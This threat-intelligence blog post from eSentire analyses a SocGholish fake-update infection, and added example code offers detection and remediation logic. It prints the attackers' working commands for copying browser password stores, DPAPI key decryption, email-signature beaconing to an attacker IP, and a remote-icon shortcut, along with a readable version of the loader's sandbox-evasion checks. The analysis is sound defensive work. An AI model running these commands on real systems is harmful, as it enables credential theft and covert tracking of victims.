URL: https://www.esentire.com/blog/socgholish-sets-sights-on-victim-peers

BLOG


SOCGHOLISH SETS SIGHTS ON VICTIM PEERS


BY eSentire Threat Response Unit (TRU)

May 8, 2024 | 8 MINS READ

Attacks/Breaches

Threat Intelligence

Threat Response Unit

TRU Positive/Bulletin






In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a
recent threat investigation. We outline how we responded to the confirmed threat
and what recommendations we have going forward.

Here’s the latest from our TRU Team…


WHAT DID WE FIND?

In April 2024, eSentire's Threat Response Unit (TRU) identified and traced
hands-on-keyboard activity to a SocGholish infection initiated by a fake browser
update. The fake update used obfuscated JavaScript to evade detection and
establish a foothold in the environment.

The attackers used living-off-the-land techniques to collect stored browser
credentials and, notably, planted web beacons in both the user's email
signatures and a network share, apparently to map out local and
business-to-business relationships. This behaviour suggests an interest in using
those relationships to target the victim's business peers.

The infection began when the user visited a compromised website and downloaded a
JavaScript file named "Update.js" (MD5: 44a0b845b30dcdc26c8017a6714c46e9) that
was presented as a browser update.

The compromised webpage contained injected JavaScript (Figure 1), and the link
led to obfuscated JavaScript code (Figure 2).

Figure 1: Injected JavaScript

Figure 2: Snippet of the obfuscated JavaScript

The snippet of the deobfuscated script is shown below (Figure 3).

Figure 3: Deobfuscated script

The script first checks whether the browser is driven by automation tooling such
as Selenium (or a headless browser) by reading the navigator.webdriver property.
If it is true, the script calls a function that loads a script from one
SocGholish URL and then stops (lines 8-12). This is almost certainly designed to
give automated analysis and detection systems a different stage than the one a
real victim receives.

Next, the script compares the window's outer and inner dimensions. A large
difference between outerHeight and innerHeight (or between the widths) is typical
of a docked developer-tools panel, a framed page or an artificially resized
analysis browser rather than a normal browsing session. If that condition holds,
it loads a script from a different URL (lines 14-21).

Additionally, the script checks whether the visitor is logged in to a WordPress
site by looking for cookie names such as "wordpress_logged_in" or "wp-settings".
If either is present, it does nothing further (lines 23-27), which keeps the
injection out of sight of the compromised site's own administrators.

If none of the mentioned conditions trigger, the script sets up an event
listener for mouse movements. Upon the first mouse movement detected, it removes
this listener and loads another script from yet another URL. This is possibly a
technique to only trigger script loading after user interaction, which can help
bypass certain types of detection mechanisms that look for malicious activity
upon page load (lines 32-37).

The _0x4d8183 function (lines 40-47) is dynamically used to insert a script
element into the webpage. This function takes a URL as an argument, creates a
<script> element, sets its src attribute to the provided URL, and appends it to
the first script tag found in the document. This method of script injection
allows external code to be run within the webpage context.

The URLs referenced in the script are:

 * hxxps://ghost.blueecho88[.]com/XnkKYSVbaQg6WzBTaU0mQy0NbxF8QygRLBxpCTsaYT40ClUHLBZkFTsLeA4sWyZDOwt4DixbMFByW3hDZFtvBy4JbEMj
 * hxxps://ghost.blueecho88[.]com/U5WuWyi3zTI3t5RpZKGCeSDhyytxr4wrIfDNMzb2xQQ55vE9IfrALzbn3DQht4J5NufcNCG3lGl/t9x5abfKNz3wxDAl/cw3NeXXPDG30w==
 * hxxps://ghost.blueecho88[.]com/gcGKZ/rj6Q7l47BVtvWmRfK17xej+6gG76DmHvuk1QHx46ZF8+OwReumqBo=

These are triggered under specific conditions in the script that have been
mentioned, executing external code when certain criteria are met, such as the
detection of automation tools or particular user interactions.
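As an added example (not code from the post or from the loader itself), the decision tree described above written out as plain, readable JavaScript, with navigator, window and document passed in as objects so it runs under Node.js. The stage URLs are placeholders for the ghost.blueecho88[.]com paths listed above, the window-delta threshold is an assumption (the post does not quote the real value), and the browser profiles are constructed. Driving the gate with different profiles shows why a crawler must present webdriver=false, normal outer/inner window geometry and a synthetic mousemove before it is served the same third stage as a victim.

```javascript
// Added example, not code from the post or from the loader itself: the gating
// decision tree of the deobfuscated script, written out readably. navigator,
// window and document are passed in as plain objects so it runs under Node.js.
// Stage URLs are placeholders for the ghost.blueecho88[.]com paths and
// WINDOW_DELTA_LIMIT is an assumed threshold (the post does not quote the real one).
const STAGE_URLS = {
  automation: "https://loader.example/stage-webdriver",   // placeholder
  resized: "https://loader.example/stage-resized",         // placeholder
  interactive: "https://loader.example/stage-mousemove",   // placeholder
};
const WINDOW_DELTA_LIMIT = 100; // assumption, CSS pixels

// Equivalent of the _0x4d8183 helper: create <script src=url> and insert it
// in front of the first <script> element already in the document.
function injectScript(doc, url) {
  const el = doc.createElement("script");
  el.src = url;
  const first = doc.getElementsByTagName("script")[0];
  first.parentNode.insertBefore(el, first);
  return el;
}

// Runs the checks in the order the post describes and returns which branch fired.
function runLoaderGate(env, doc) {
  // lines 8-12: Selenium and headless browsers expose navigator.webdriver === true
  if (env.navigator.webdriver === true) {
    injectScript(doc, STAGE_URLS.automation);
    return "automation";
  }
  // lines 14-21: big outer/inner delta = devtools docked, framed page or resized shell
  const dh = Math.abs(env.window.outerHeight - env.window.innerHeight);
  const dw = Math.abs(env.window.outerWidth - env.window.innerWidth);
  if (dh > WINDOW_DELTA_LIMIT || dw > WINDOW_DELTA_LIMIT) {
    injectScript(doc, STAGE_URLS.resized);
    return "resized";
  }
  // lines 23-27: stay silent for anyone logged in to the compromised WordPress site
  if (/wordpress_logged_in|wp-settings/.test(doc.cookie)) return "wp-admin-skip";
  // lines 32-37: one-shot mousemove handler; without a real user there is no stage 3
  const onMove = () => {
    doc.removeEventListener("mousemove", onMove);
    injectScript(doc, STAGE_URLS.interactive);
  };
  doc.addEventListener("mousemove", onMove);
  return "armed";
}

// Minimal DOM stand-in that records injected script URLs and event listeners.
function makeFakeDocument(cookie = "") {
  const listeners = new Map();
  const injected = [];
  const firstScript = { parentNode: { insertBefore: (node) => injected.push(node.src) } };
  return {
    cookie,
    injected,
    createElement: () => ({ src: "" }),
    getElementsByTagName: () => [firstScript],
    addEventListener: (type, fn) => listeners.set(type, [...(listeners.get(type) || []), fn]),
    removeEventListener: (type, fn) =>
      listeners.set(type, (listeners.get(type) || []).filter((f) => f !== fn)),
    dispatch: (type) => [...(listeners.get(type) || [])].forEach((fn) => fn()),
    listenerCount: (type) => (listeners.get(type) || []).length,
  };
}

// Drives the gate with one browser profile, optionally simulating a mouse movement,
// and reports what a crawler presenting that profile would have been served.
function simulate({ webdriver, outer, inner, cookie = "", moveMouse = false }) {
  const env = {
    navigator: { webdriver },
    window: { outerWidth: outer[0], outerHeight: outer[1], innerWidth: inner[0], innerHeight: inner[1] },
  };
  const doc = makeFakeDocument(cookie);
  const branch = runLoaderGate(env, doc);
  if (moveMouse) doc.dispatch("mousemove");
  return { branch, loaded: doc.injected, pendingListeners: doc.listenerCount("mousemove") };
}

// Constructed browser profiles: Selenium crawler, devtools docked, site admin,
// ordinary user before and after the first mouse movement.
const PROFILES = {
  selenium:  { webdriver: true,  outer: [1280, 800], inner: [1280, 800] },
  devtools:  { webdriver: false, outer: [1280, 900], inner: [1280, 520] },
  wpAdmin:   { webdriver: false, outer: [1280, 800], inner: [1280, 720], cookie: "wordpress_logged_in_abc=1" },
  userIdle:  { webdriver: false, outer: [1280, 800], inner: [1280, 720] },
  userMoves: { webdriver: false, outer: [1280, 800], inner: [1280, 720], moveMouse: true },
};

function simulateAll() {
  return Object.fromEntries(Object.entries(PROFILES).map(([name, p]) => [name, simulate(p)]));
}

console.log(JSON.stringify(simulateAll(), null, 2));
```

Because the loader reacts only to the first mousemove, a sandbox that loads the page and simply waits never requests the third URL; dispatching a mouse event after load, with navigator.webdriver reporting false and realistic window geometry, is the minimum emulation needed to capture that stage.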

The downloaded malicious Update.js file contains an obfuscated JavaScript
(Figure 4).

Figure 4: Contents of Update.js

The script makes a POST request to the URL
hxxps://tfuq.register.arpsychotherapy[.]com/editContent. The “send” method sends
the request to the server with data
“lpZw+wmbGiagWaoqNM/HmfLjMBYLsTv26io31cysSA==” (Figure 5).

Figure 5: Deobfuscated Update.js

Post-exploitation Activity

17 minutes after the malicious JavaScript payload was executed by the user, we
identified hands-on-keyboard activity on the victim asset. This activity
included stored password extraction, decryption, and reconnaissance.

Password Store Extraction

The threat actors extracted saved login data from Microsoft Edge and Google
Chrome and copied them to a temporary file for exfiltration using the following
commands:

 * "C:\Windows\System32\cmd.exe" /C type
   "C:\Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data"
   >> "C:\Users\username\AppData\Local\Temp\2\radC7958.tmp"
 * "C:\Windows\System32\cmd.exe" /C type
   "C:\Users\username\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"
   >> "C:\Users\username\AppData\Local\Temp\2\rad01734.tmp"

Shortly after, another command copied the Login Data files of both browsers to a
different user's Downloads directory and redirected any output or errors to a
temporary file (username is the primary infected user; username_2 is another
user on the same machine):

 * "C:\Windows\System32\cmd.exe" /C copy
   "C:\Users\username\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"
   C:\users\username_2\Downloads\0395edg.bin&copy
   "C:\Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data"
   C:\users\username_2\Downloads\0396chr.bin >>
   "C:\Users\username\AppData\Local\Temp\2\rad5914F.tmp"

Staging the credential data under another user is likely done for redundancy
purposes in case the main files are discovered.

Encryption Key Retrieval

Next, the threat actors ran a base64-encoded PowerShell command for each browser.
The decoded command reads the encrypted_key value from the browser's Local State
JSON file, base64-decodes it, strips the five-byte "DPAPI" prefix (the $3[5..]
slice) and passes the remainder to DPAPI's ProtectedData.Unprotect in the
CurrentUser scope, writing the resulting key, which protects the saved passwords
and cookies, to a temporary file. Because the key is protected under the
logged-on user's own DPAPI scope, no elevation is needed: any code running as
that user can recover it with nothing more than built-in PowerShell.

The decoded commands:

 * "C:\Windows\System32\cmd.exe" /C powershell -enc $1 = (gc
   "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State").split(',')|
   select-string encrypted_key; $2 = $1 -replace '"}', '' -replace
   '"encrypted_key":"','';Add-Type -AssemblyName System.Security;;$3 =
   [System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 =
   [System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4
   >> "C:\Users\username\AppData\Local\Temp\2\rad1F269.tmp"
 * "C:\Windows\System32\cmd.exe" /C powershell -enc $1 = (gc
   "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Local State").split(',')|
   select-string encrypted_key; $2 = $1 -replace '"}', '' -replace
   '"encrypted_key":"','';Add-Type -AssemblyName System.Security;;$3 =
   [System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 =
   [System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4
   >> "C:\Users\username\AppData\Local\Temp\2\rad65036.tmp"

Python Script Execution

Subsequently, the threat actors ran the following PowerShell command ten times.
It downloads the embeddable (portable) Python 3.12.0 distribution, extracts it
under AppData\Local\ConnectedDevicesPlatform\pypa, fetches get-pip.py, creates a
DLLs directory and renames python312._pth to python312.pth. The rename matters:
the ._pth file is what keeps the embeddable interpreter isolated from
site-packages, so removing it lets pip install and import additional packages,
presumably to run further Python payloads.

 * powershell -c "wget
   https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip
   -OutFile C:\Users\username\AppData\Local\ConnectedDevicesPlatform\python.zip;ls
   C:\Users\username\AppData\Local\ConnectedDevicesPlatform\python.zip;Expand-Archive
   -LiteralPath C:\Users\username\AppData\Local\ConnectedDevicesPlatform\python.zip
   -DestinationPath C:\Users\username\AppData\Local\ConnectedDevicesPlatform\pypa;rm
   C:\Users\username\AppData\Local\ConnectedDevicesPlatform\python.zip;ls
   C:\Users\username\AppData\Local\ConnectedDevicesPlatform\pypa;wget
   https://bootstrap.pypa.io/get-pip.py -OutFile
   C:\Users\username\AppData\Local\ConnectedDevicesPlatform\pypa\get-pip.py;cd
   C:\Users\username\AppData\Local\ConnectedDevicesPlatform\pypa;mkdir DLLs;ren
   python312._pth python312.pth"

Email Contact Reconnaissance

The threat actors then ran a base64-encoded PowerShell command to modify the
HTML signature files used by Microsoft Outlook.

 * "C:\Windows\System32\cmd.exe" /C powershell.exe -encodedCommand Get-ChildItem
   -Path $env:APPDATA\Microsoft\Signatures -Filter *.htm | ForEach-Object {
   (Get-Content $_.FullName) -replace '</body>', "`r`n<img
   src=`"file://170.130.55[.]72/logocompany.jpeg`">`r`n</body>" | Set-Content
   $_.FullName } >> "C:\Users\username\AppData\Local\Temp\2\rad1F1BD.tmp"

The command lists all HTML (.htm) files in the directory where Outlook stores
email signatures and rewrites each one, replacing the closing </body> tag with
an <img> tag followed by the original </body>. The <img> source points at a file
on a remote server (the URL in the command), so every signature now references
attacker-controlled content. Any output from the PowerShell command is
redirected to a temporary file.

The exact purpose of this change is unknown, but the most likely use is tracking
when and where the victim's outgoing email is opened: each time a recipient's
client renders the signature, it requests the image from the attacker's server,
revealing the recipient's IP address, a timestamp and potentially other details
about the recipient's environment. Because the source is a file:// URL, Windows
treats it as a UNC path, so the fetch goes out over SMB (or WebDAV) rather than
HTTP, which is what to look for in the recipient side's egress logs.
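An added example for the forensic side of this step (not code from the post): when command-line logging was not available, the tampered artifact itself can still be found. The functions below scan the HTML of an Outlook signature for images fetched from a host (file://, UNC or http(s) sources) rather than embedded cid: or relative references, and strip them for remediation. The sample signature is constructed; the beacon URL mirrors the one in the command above.

```javascript
// Added example, not the post's code: find and remove tracking images planted in
// Outlook signature HTML. Run findBeaconImages over each .htm under
// %APPDATA%\Microsoft\Signatures; the sample below is constructed.

// Matches <img ...> and captures the src value in double-, single- or unquoted form.
const IMG_RE = /<img\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))[^>]*>/gi;

// Legitimate signature images are embedded (cid:) or live in the signature's own
// _files folder; anything fetched from a host is a beacon candidate.
function isRemoteSource(src) {
  return /^(?:file:|\\\\|https?:|\/\/)/i.test(src.trim());
}

// Returns every remotely sourced <img> with its src and the full tag for the report.
function findBeaconImages(html) {
  const hits = [];
  for (const m of html.matchAll(IMG_RE)) {
    const src = m[1] ?? m[2] ?? m[3];
    if (isRemoteSource(src)) hits.push({ src, tag: m[0] });
  }
  return hits;
}

// Returns the signature with remotely sourced <img> tags removed; cid:/relative ones stay.
function stripBeaconImages(html) {
  return html.replace(IMG_RE, (tag, dq, sq, bare) => (isRemoteSource(dq ?? sq ?? bare) ? "" : tag));
}

// Constructed sample: an ordinary signature after the attacker's -replace has run on it.
const SAMPLE_SIGNATURE = `<html><body>
<p>Jane Doe<br>Account Manager</p>
<img src="cid:image001.png@01DA.ABCD" width="120">
<img src="Jane%20Doe_files/image002.png">
<img src="file://170.130.55.72/logocompany.jpeg">
</body></html>`;

console.log(findBeaconImages(SAMPLE_SIGNATURE));
console.log(stripBeaconImages(SAMPLE_SIGNATURE));
```

The check is deliberately coarse: any host-sourced image in a signature is unusual enough to review by hand, and the same scan applied to the mail server's outbound copies of the user's messages shows how many external contacts have already received the beacon.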

Network Discovery

The threat actors then listed the members of the “domain users” group in a
domain environment by running the C:\Windows\system32\net1 group "domain users"
/domain command.

The last command creates a shortcut (.lnk) on a network share. The shortcut's
target path is the share itself, and its icon location points to the SocGholish
C2 server at \\170.130.55[.]72\Documentation.ico.

 * "C:\Windows\System32\cmd.exe" /C powershell $W = New-Object -comObject
   WScript.Shell;$S =
   $W.CreateShortcut('\\<REDACTED>\Documentation.lnk');$S.TargetPath =
   '\\<REDACTED>';$S.IconLocation =
   '\\170.130.55[.]72\Documentation.ico';$S.Save() >>
   "C:\Users\username\AppData\Local\Temp\2\rad69C33.tmp"

Again, the purpose of this command is unknown, but we assume it serves the same
monitoring role as the modified email signatures: whenever a user browses the
share in Explorer (the icon is resolved to draw the folder listing, so the
shortcut does not even need to be opened), the client contacts the C2 server to
fetch the icon file, giving the attacker the browsing host's IP address and a
timestamp.
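The post lists the commands but no detection logic for them. As an added example (not eSentire's code or detections), the following is a command-line triage pass over process-creation telemetry (Sysmon Event ID 1 or Windows 4688 with command-line auditing) that decodes PowerShell -enc payloads (base64 of UTF-16LE) before matching, so the DPAPI key-extraction and signature-tampering scripts above are caught in their encoded form. One rule each covers the Password Store Extraction, Encryption Key Retrieval, Python Script Execution, Email Contact Reconnaissance and Network Discovery commands. The rule names are this example's own, and the sample events are constructed from the post's commands with placeholder usernames (jdoe) and a placeholder share name.

```javascript
// Added example, not eSentire's code: triage process command lines for the
// post-exploitation behaviours described above. Sample events are constructed
// from the post's commands with placeholder user and share names.

// PowerShell's -e / -ec / -enc / -EncodedCommand takes base64 of UTF-16LE text.
function decodeEncodedCommand(cmdline) {
  const m = cmdline.match(/-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})/i);
  return m ? Buffer.from(m[1], "base64").toString("utf16le") : null;
}

// Used only to build the samples the way the attacker's tooling would.
function encodeForPowerShell(script) {
  return Buffer.from(script, "utf16le").toString("base64");
}

// One rule per behaviour; names are this example's own, not a vendor's.
const RULES = [
  { name: "browser-login-data-via-shell",       // type/copy of Chrome or Edge "Login Data"
    test: (t) => /\\(Chrome|Edge)\\User Data\\[^"]*\\Login Data/i.test(t) && /\b(type|copy)\b/i.test(t) },
  { name: "dpapi-browser-key-decrypt",          // Local State encrypted_key -> DPAPI Unprotect
    test: (t) => /Local State/i.test(t) && /encrypted_key/i.test(t) && /ProtectedData\]::Unprotect/i.test(t) },
  { name: "portable-python-staging",            // embeddable python or get-pip fetched by script
    test: (t) => /python-3\.\d+\.\d+-embed-\w+\.zip/i.test(t) || /get-pip\.py/i.test(t) },
  { name: "outlook-signature-tamper",           // <img> written into Signatures\*.htm
    test: (t) => /Microsoft\\Signatures/i.test(t) && /<img/i.test(t) },
  { name: "lnk-remote-icon",                    // WScript.Shell shortcut with a UNC IconLocation
    test: (t) => /CreateShortcut/i.test(t) && /IconLocation\s*=\s*'\\\\/i.test(t) },
  { name: "domain-users-enumeration",           // net/net1 group "domain users" /domain
    test: (t) => /\bnet1?(?:\.exe)?\s+group\s+"?domain users"?\s+\/domain/i.test(t) },
];

// Rules run over the raw command line plus the decoded payload, so -enc hides nothing.
function triageEvent(event) {
  const decoded = decodeEncodedCommand(event.cmdline);
  const text = decoded ? `${event.cmdline}\n${decoded}` : event.cmdline;
  return { id: event.id, hits: RULES.filter((r) => r.test(text)).map((r) => r.name), decoded };
}

function triageEvents(events) {
  return events.map(triageEvent).filter((r) => r.hits.length > 0);
}

// --- constructed samples (String.raw keeps the Windows backslashes readable) ---
const DPAPI_SCRIPT = String.raw`$1 = (gc "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State").split(',')| select-string encrypted_key; $2 = $1 -replace '"}', '' -replace '"encrypted_key":"','';Add-Type -AssemblyName System.Security;$3 = [System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 = [System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4 >> "C:\Users\jdoe\AppData\Local\Temp\rad1F269.tmp"`;
const SIGNATURE_SCRIPT = String.raw`Get-ChildItem -Path $env:APPDATA\Microsoft\Signatures -Filter *.htm | ForEach-Object { (Get-Content $_.FullName) -replace '</body>', '<img src="file://170.130.55.72/logocompany.jpeg"></body>' | Set-Content $_.FullName }`;

const SAMPLE_EVENTS = [
  { id: 1, cmdline: String.raw`"C:\Windows\System32\cmd.exe" /C type "C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data" >> "C:\Users\jdoe\AppData\Local\Temp\radC7958.tmp"` },
  { id: 2, cmdline: String.raw`"C:\Windows\System32\cmd.exe" /C powershell -enc ` + encodeForPowerShell(DPAPI_SCRIPT) },
  { id: 3, cmdline: String.raw`powershell -c "wget https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile C:\Users\jdoe\AppData\Local\ConnectedDevicesPlatform\python.zip;wget https://bootstrap.pypa.io/get-pip.py -OutFile C:\Users\jdoe\AppData\Local\ConnectedDevicesPlatform\pypa\get-pip.py"` },
  { id: 4, cmdline: String.raw`"C:\Windows\System32\cmd.exe" /C powershell.exe -encodedCommand ` + encodeForPowerShell(SIGNATURE_SCRIPT) },
  { id: 5, cmdline: String.raw`"C:\Windows\System32\cmd.exe" /C powershell $W = New-Object -comObject WScript.Shell;$S = $W.CreateShortcut('\\fileserver\share\Documentation.lnk');$S.TargetPath = '\\fileserver\share';$S.IconLocation = '\\170.130.55.72\Documentation.ico';$S.Save()` },
  { id: 6, cmdline: String.raw`C:\Windows\system32\net1 group "domain users" /domain` },
  { id: 7, cmdline: String.raw`powershell -c "Get-Process | Select-Object -First 5"` }, // benign control
];

console.log(JSON.stringify(triageEvents(SAMPLE_EVENTS), null, 2));
```

Regex rules like these are brittle against renamed binaries and alternative encodings, so treat them as hunting queries rather than a complete detection. The DPAPI rule (Local State, encrypted_key and ProtectedData::Unprotect together) is the one with essentially no legitimate administrative use and is worth alerting on at high severity; the Login Data rule should also be correlated with the parent process, since browsers themselves never read that file through cmd.exe.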

The SocGholish intrusion campaign showcased a social engineering approach to
first gain entry through fake updates and then initiate a series of scripted
actions to extract sensitive data and monitor user interactions.


WHAT DID WE DO?

Our team of 24/7 SOC Cyber Analysts isolated the affected host and notified the
customer of suspicious activities.


WHAT CAN YOU LEARN FROM THIS TRU POSITIVE?

 * The initial infection vector being a drive-by download disguised as a
   legitimate browser update highlights the critical need for user education
   about the risks associated with downloading files from unverified or
   suspicious sources.
 * The extraction of sensitive data such as browser login information, and the
   modification of email signatures to monitor interactions, underline the
   importance of comprehensive monitoring of host and network behaviour and the
   analysis of unusual activity that could indicate a compromise.
 * The use of encoded PowerShell scripts to decrypt stored passwords and the
   setting up of a portable Python environment for further malicious activities
   stresses the importance of understanding post-exploitation behaviors and
   potential indicators of compromise to better defend against and respond to
   intrusions.


RECOMMENDATIONS FROM OUR THREAT RESPONSE UNIT (TRU):

We recommend implementing the following controls to help secure your
organization against SocGholish malware:

 * Confirm that all devices are protected with Endpoint Detection and Response
   (EDR) solutions.
 * Implement a Phishing and Security Awareness Training (PSAT) Program that
   educates and informs your employees on emerging threats in the threat
   landscape.
 * Encourage your employees to use password managers instead of using the
   password storage feature provided by web browsers. Use master passwords where
   applicable.
 * Modify the default 'open-with' association for script files (.js, .jse,
   .vbs, .wsf) so they open in a basic text editor such as Notepad instead of
   executing through the Windows Script Host.


INDICATORS OF COMPROMISE

You can access the indicators here.



ESENTIRE THREAT RESPONSE UNIT (TRU)

The eSentire Threat Response Unit (TRU) is an industry-leading threat research
team committed to helping your organization become more resilient. TRU is an
elite team of threat hunters and researchers that supports our 24/7 Security
Operations Centers (SOCs), builds threat detection models across the eSentire
XDR Cloud Platform, and works as an extension of your security team to
continuously improve our Managed Detection and Response service. By providing
complete visibility across your attack surface and performing global threat
sweeps and proactive hypothesis-driven threat hunts augmented by original threat
research, we are laser-focused on defending your organization against known and
unknown threats.



